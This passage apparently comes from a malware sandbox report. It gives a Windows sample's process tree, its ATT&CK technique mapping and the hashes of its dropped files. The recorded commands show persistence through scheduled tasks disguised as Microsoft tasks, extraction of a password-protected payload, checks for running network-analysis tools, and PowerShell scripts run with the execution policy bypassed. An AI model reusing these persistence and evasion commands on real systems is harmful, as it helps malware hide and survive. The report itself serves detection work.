        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:3512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F"
        5⤵
        
        PID:8
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2224
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange" /tr "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw"" /sc once /st 00:00 /du 9999:59 /ri 5 /RL HIGHEST /F"
        5⤵
        
        PID:2676
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange" /tr "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw"" /sc once /st 00:00 /du 9999:59 /ri 5 /RL HIGHEST /F
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /change /tn "nul" /disable"
        5⤵
        
        PID:4648
      - C:\Windows\system32\schtasks.exe
        
        schtasks /change /tn "nul" /disable
        6⤵
        
        PID:4408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c ""C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\617fg7.7z" -p7KoLumBiyaDTX001!! -o"C:\Users\Admin\AppData\Local\Temp\617fg7" -y"
        5⤵
        
        PID:3032
      - C:\ProgramData\sevenZip\7z.exe
        
        "C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\617fg7.7z" -p7KoLumBiyaDTX001!! -o"C:\Users\Admin\AppData\Local\Temp\617fg7" -y
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "net session"
        5⤵
        
        PID:2928
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:1508
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:2640
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange" >nul 2>&1"
        5⤵
        
        PID:1320
      - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange"
        6⤵
        
        PID:3688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" >nul 2>&1"
        5⤵
        
        PID:4404
      - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange"
        6⤵
        
        PID:2108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "taskkill /f /pid 4468"
        5⤵
        
        PID:2184
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid 4468
        6⤵
        Kills process with taskkill
        
        PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq watcher.exe""
    3⤵
    PID:3980
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq watcher.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmdump.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1208
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmdump.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmproxy.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1524
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmproxy.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmweb.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3908
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmweb.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Insomnia.exe""
    3⤵
    PID:3668
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Insomnia.exe"
      4⤵
      Enumerates processes with tasklist
      PID:184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTP Toolkit.exe""
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTP Toolkit.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Charles.exe""
    3⤵
    PID:1056
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Charles.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Postman.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2908
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Postman.exe"
      4⤵
      Enumerates processes with tasklist
      PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BurpSuiteCommunity.exe""
    3⤵
    PID:2004
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq BurpSuiteCommunity.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler Everywhere.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5016
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler Everywhere.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler.WebUi.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler.WebUi.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerUI.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerUI.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerSvc.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2936
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerSvc.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerPro.exe""
    3⤵
    PID:548
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerPro.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Progress Telerik Fiddler Web Debugger.exe""
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Progress Telerik Fiddler Web Debugger.exe"
      4⤵
      Enumerates processes with tasklist
      PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTP Debugger Pro.exe""
    3⤵
    PID:4484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:184
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTP Debugger Pro.exe"
      4⤵
      Enumerates processes with tasklist
      PID:4312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2208
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler.exe"
      4⤵
      Enumerates processes with tasklist
      PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq FolderChangesView.exe""
    3⤵
    PID:2928
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq FolderChangesView.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Wireshark.exe""
    3⤵
    PID:3980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Wireshark.exe"
      4⤵
      Enumerates processes with tasklist
      PID:464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens0828.ps1""
    3⤵
    PID:2168
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:548
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens0828.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "taskkill /f /pid 1928"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3908
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /pid 1928
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:4712

C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe
C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1""
  2⤵
  PID:640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1""
  2⤵
  PID:4912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1""
  2⤵
  PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
1⤵
PID:4512

C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe
C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1""
  2⤵
  PID:1856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1""
  2⤵
  PID:4992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1""
  2⤵
  PID:3200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:740

C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe
C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1""
  2⤵
  PID:6352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\boot.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:6392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1""
  2⤵
  PID:6564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\kernel.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:6604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1""
  2⤵
  PID:6796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Programs\Common\NUL\thread.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:6844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Window

T1564.003

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\sevenZip\7z.exe

Filesize
577KB

MD5
c31c4b04558396c6fabab64dcf366534

SHA1
fa836d92edc577d6a17ded47641ba1938589b09a

SHA256
9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

SHA512
814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\Folder\FM.ps1

Filesize
380B

MD5
b59f6eaee4f8dc1624b75ed63399955e

SHA1
ad25ee224973140d41c6ecf1c1500d4efeb0b324

SHA256
be7687583a5157282206ac6483cd1798f5bed91047767fc0f0c32d9b8531da2e

SHA512
482f25826d76d293302d24316aeab47e4a4eaee451ec692ac3b26a5943607c09c545e52e21b520236342403cddaf9fa0de3c84dde440f8e93be2fa6e36af6088

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\Folder\folder_settings.dll

Filesize
4KB

MD5
62f1350d6413b883c07ec947cb0f68c6

SHA1
17eee108fb7027e728ff389445e8565d051780ce

SHA256
e1e3688466addd61e686ec3151b54511668093eb38a42820a4f9699a0b764d99

SHA512
b9ce5fced341c6927294a5d477405e6e292b49175f049bde39444596ac44d77f7673ddd4c413fa6bdc6367a53acac54bde5e4d07ec68e30ee3cbecddb3f52450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\boot.manifest

Filesize
78KB

MD5
f1cf7646400d0b8d7c1003d2a5ccd8eb

SHA1
ba0e9606f7a8104bf56ebc2b4d7bef493790e300

SHA256
29f0c55ad5c3dcda8d5f32f03f688749d79c9e21183496a4c5b51ef91181b002

SHA512
21604f42708a2bdd2e7df29cc3f2332bd7b83e15fce2009f6f534bffe46a777096a0b2cd893aed6e1d0bd1c358b05721a877b0d0103d4dfef2f7eb57386d1103

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\boot.ps1

Filesize
2KB

MD5
5405a0eb1f05de639d52a632b6defdd6

SHA1
8f5927f8bf03ecdae686242379e395d681127d1d

SHA256
1e0ecd6be91a713986dac35108003b21503e000f7f020c20077be7eac6b3bb6c

SHA512
53b219a30818bf8c4f169f8a567ea7063f821f8f4f54ab5595f067ffb19cae54862bac2b7dc375f446162914dcedd39350cb2ec9bdeac538ca22ebda8c6be927

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\kernel.manifest

Filesize
78KB

MD5
d3f81d549b720319c34dda63c3495bed

SHA1
0e1b5021fd3b6c64d7a0647e01047ed830bdeb52

SHA256
524968edecde106b6d4f1ace5d164485a19f62f55c00fd3bd9305cf2757910b6

SHA512
6030ad89b106b51b8e4d1cc4245d3040c113a828c4b6e835ebbcd8f3d252a7a3efee78d00069e437db828d8c75ac3936a3db4b4d21d1a228ed4c18bfd0043318

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\kernel.ps1

Filesize
2KB

MD5
e8137bfe261d0f799ec2236d1a4e435b

SHA1
95f1cf3522005de3dd4c967b0529d9b554a38f2d

SHA256
a73c014fa411362e795778947184c3699c1954bb7df34574ce1b70b0201170e7

SHA512
4d06df97e21091ba3155da6b9e588e2e3be031a26987d30eeea419d14206f400f886b889cad92f3b34de81f229fc2063653c30ab66a14e8c230d6810522ca7dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\mbam.ps1

Filesize
268B

MD5
1bf5b5c4ae171abf778371cd334f164e

SHA1
98d4e1592bac63a08410647c8767c172c34aa8c8

SHA256
cc28b813a5fb5234d8f01f4ba65c766802022bb3fcdfde81dde4417079158078

SHA512
9b99a56ec8b90893b03bd826ab4396d15c2a01916381a04f0b30e25ceb3a9942327a46ccc25855961558d3d9561af52048329fd7bb05884713a26d4434662e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\_weakrefset.py

Filesize
5KB

MD5
06c63c4624fb2be6befd2e832b3b4bc2

SHA1
d373f09fcac33928e9f5330b0c6d1cfdb2f73b0a

SHA256
cf8031a6e21150438f3d2964c4152615b91a03894616d5b6930e0f14f44dabda

SHA512
24d7cd2e0959e90de5e4d252bcb655376833a948b03e99e2ce727ce115bffe0247475d9ef096a4aacafdbd1d3681031f44e63de9a77b221b444c4fc40574a86e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\ast.py

Filesize
64KB

MD5
5151a0383bade72982c59d5e7bd5b2ac

SHA1
d91d8446c427b23fa39b603dfde047028471a288

SHA256
a3cc2501761596db13cdc84f085dd2736e5c352b51f39f26bdd2407d99dfbb72

SHA512
5a46b0923ef9f1e42123d98b0ca62c2afdc337b90788b9849a16bb77e8795e57f7e1121339b0d39b4ff9ab467ad11d36e532d5bef5e299e196202090bcd0ba20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\collections\__init__.py

Filesize
52KB

MD5
251382c3e093c311a3e83651cbdbcc11

SHA1
28a9de0e827b37280c44684f59fd3fcc54e3eabd

SHA256
1eb4c4445883fd706016aca377d9e5c378bac0412d7c9b20f71cae695d6bb656

SHA512
010b171f3dd0aa676261a3432fe392568f364fe43c6cb4615b641994eb2faf48caabf3080edf3c00a1a65fc43748caaf692a3c7d1311b6c90825ffce185162b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\collections\__pycache__\__init__.cpython-312.pyc

Filesize
71KB

MD5
2f846072ddfbedc006ca7a44aaebc04b

SHA1
cd97b7c22ad7f769ea6ed3b3b4da8529c0a30268

SHA256
3bfd823db57d33ea6dcd2746c7bb8b9ff584c1c27599398ba5b7858ed8a91434

SHA512
ca885784d582767f254fb4a574b919c8479f4bc038496c16176fe03398a67f580946020a710095a007141fbc6f94435a8e9b3734ec272781b3f584ac7c1f85c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\collections\abc.py

Filesize
122B

MD5
bef5a0af889cbe656d8f36952b66d86a

SHA1
f58423be30acec27e1b47617f47d2b6c94f01a72

SHA256
7ad86878712fc6682863f12208f4ced5daf2dd82b6ff5ed58207de29d0efa410

SHA512
9dd60f99da7fcaabe8ce08ab012cd507a98ee6e47dda4a4e462ceb57db16653b97b21d1df1436dccedb1cd4b59433cecb697bcc3e031b52585f67c8454db487d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\contextlib.py

Filesize
27KB

MD5
e73cf7b338173f1994e840fc6ab24684

SHA1
e0cf23d53654914ec6a781778ba2096ff1fb5657

SHA256
a53b1db774f19c6b1e4320c2bc64058c49e3fba58b20b9c1158e5a8d02069890

SHA512
b343deb299c74c33821a2e865dc2d8f2f2985e214cd7d0e13fcf751e987fd8ad26527cedcba3885be8d2b4ea8a4971facf3073f41153a60614a72ea4fd70b25c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\copyreg.py

Filesize
7KB

MD5
5eb8600498b0076c779df8e9967cc987

SHA1
6ae4d522fd0e15a40553be46fb0080cf837a2d40

SHA256
ea2363638fe83e8e5b007013a821841371a615d99414b3c2f8f19152ca109a07

SHA512
faa410a313ce8a1e2427fb5ae8aa272689e71ae8c3f9c81e95820ed2b267bb79d7749754bef05c24e702bc80bb288b77a14f6711c016df405511822713eee8c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\aliases.py

Filesize
15KB

MD5
ff23f6bb45e7b769787b0619b27bc245

SHA1
60172e8c464711cf890bc8a4feccff35aa3de17a

SHA256
1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8

SHA512
ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\ascii.py

Filesize
1KB

MD5
ff48c6334861799d8d554f5d2a30ba00

SHA1
08520b19d0353712cdfd919b3694945678c3d2d7

SHA256
698c578b9b5df7bd6f8b2761d114f74cff854c1396083c8ab912b11fcae83b86

SHA512
087a0e1ba9d9ca2c2f51f0156ad0ada1d1eb7ccba8b46159b95779b053d2431fc52ba1ca57fec381ea044a7f0e41490b5389b1af2dbf513c35cc1b29997fee6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\base64_codec.py

Filesize
1KB

MD5
46f8e67e43dac28160f47e3870b39365

SHA1
0b1a69175889e5d4603c616ebd6e7ec456c6abcb

SHA256
ac4443ceb3e045f064335aed4c9c2143f1c256ddd25aaa5a9db4b5ee1bccf694

SHA512
cfea01544e998caed550b37b61439014d0ba6d707068f1d7e4726a6ac8f4b8b81c2e7ed3a5dfb76687d1fdbcd7ec2dc6c5047d8061eccbc8a59a4587fcbed253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\big5.py

Filesize
1KB

MD5
9ae0a356995140bff35627c45e7da1b8

SHA1
7a23003577d29b3470bee6ee996eaa2ea120fdd3

SHA256
cadb1c66d355f551e4d99a895725b62211cc5cbde1f037c61fd4463932ff70cb

SHA512
f8764cfb30bd5ee67b527dc0ff5e70e41f03d617ef3ab0a3de021825b751105373a251919e00a9f5c4f581471b393565a51c3b09b4cd1bd11bd8ebba37545b42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\big5hkscs.py

Filesize
1KB

MD5
